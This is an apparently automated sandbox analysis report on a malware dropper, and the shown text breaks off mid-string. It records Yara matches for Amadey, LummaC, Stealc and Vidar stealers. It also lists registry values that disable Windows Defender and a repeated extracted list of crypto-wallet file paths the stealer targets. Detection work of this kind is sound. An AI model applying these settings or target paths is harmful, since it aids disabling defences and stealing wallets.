Source: DocumentsGDHIDHIEGI.exe, 00000009.00000002.2129045777.00000000008B9000.00000040.00000001.01000000.0000000B.sdmp, skotes.exe, 0000000A.00000002.2143638200.0000000000809000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: <Program Manager
Source: file.exe, file.exe, 00000000.00000002.2043433049.0000000000BC3000.00000040.00000001.01000000.00000003.sdmp, df5dd36577.exe, 00000014.00000002.2675797848.0000000000483000.00000040.00000001.01000000.00000015.sdmp	Binary or memory string: 5l=Program Manager

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C7CAE71 cpuid

0_2_6C7CAE71

Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1006431001\stories.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1006431001\stories.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1006441001\df5dd36577.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1006441001\df5dd36577.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1006441001\df5dd36577.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1006441001\df5dd36577.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C7CA8DC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_6C7CA8DC

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C718390 NSS_GetVersion,

0_2_6C718390

Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Disable Windows Defender notifications (registry)

Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe

Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1

Disable Windows Defender real time protection (registry)

Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableIOAVProtection 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableRealtimeMonitoring 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications	Registry value created: DisableNotifications 1

Disables Windows Defender Tamper protection

Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe

Registry value created: TamperProtection 0

Modifies windows update settings

Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptions
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AutoInstallMinorUpdates
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate DoNotConnectToWindowsUpdateInternetLocations

Source: e708276138.exe, 00000015.00000003.2816346098.00000000013C1000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000015.00000003.2784626027.00000000013C1000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000015.00000003.2796621255.00000000013C1000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000017.00000003.2910583700.0000000000E20000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000017.00000002.2957132719.0000000000E20000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 9.2.DocumentsGDHIDHIEGI.exe.680000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.skotes.exe.5d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.2128190880.0000000000681000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2142964969.00000000005D1000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: e708276138.exe PID: 5960, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: e708276138.exe PID: 4484, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: e708276138.exe PID: 6324, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected Stealc

Source: Yara match	File source: 00000019.00000002.2861182508.0000000000D1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.2815171977.0000000004A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.2633611345.0000000004A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.2858405616.00000000000B1000.00000040.00000001.01000000.00000015.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2043049111.00000000007F1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1717266617.00000000052D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2044630050.000000000160E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2677024586.0000000000C6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2675232544.00000000000B1000.00000040.00000001.01000000.00000015.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 4940, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: df5dd36577.exe PID: 6216, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: df5dd36577.exe PID: 7676, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 4940, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: file.exe, 00000000.00000002.2043049111.0000000000874000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2043049111.00000000008A5000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: \ElectronCash\wallets\
Source: file.exe, 00000000.00000002.2043049111.0000000000874000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2043049111.00000000008A5000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: Jaxx Desktop (old)
Source: file.exe, 00000000.00000002.2043049111.0000000000874000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2043049111.0000000000874000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2043049111.00000000008A5000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: \Exodus\exodus.wallet\
Source: file.exe, 00000000.00000002.2043049111.00000000008A5000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: info.seco
Source: file.exe, 00000000.00000002.2043049111.0000000000874000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2043049111.00000000008A5000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: \jaxx\Local Storage\
Source: file.exe, 00000000.00000002.2043049111.0000000000874000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2043049111.0000000000874000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2043049111.00000000008A5000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: Exodus\exodus.wallet
Source: file.exe, 00000000.00000002.2043049111.00000000008A5000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: file__0.localstorage
Source: file.exe, 00000000.00000002.2043049111.0000000000874000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx 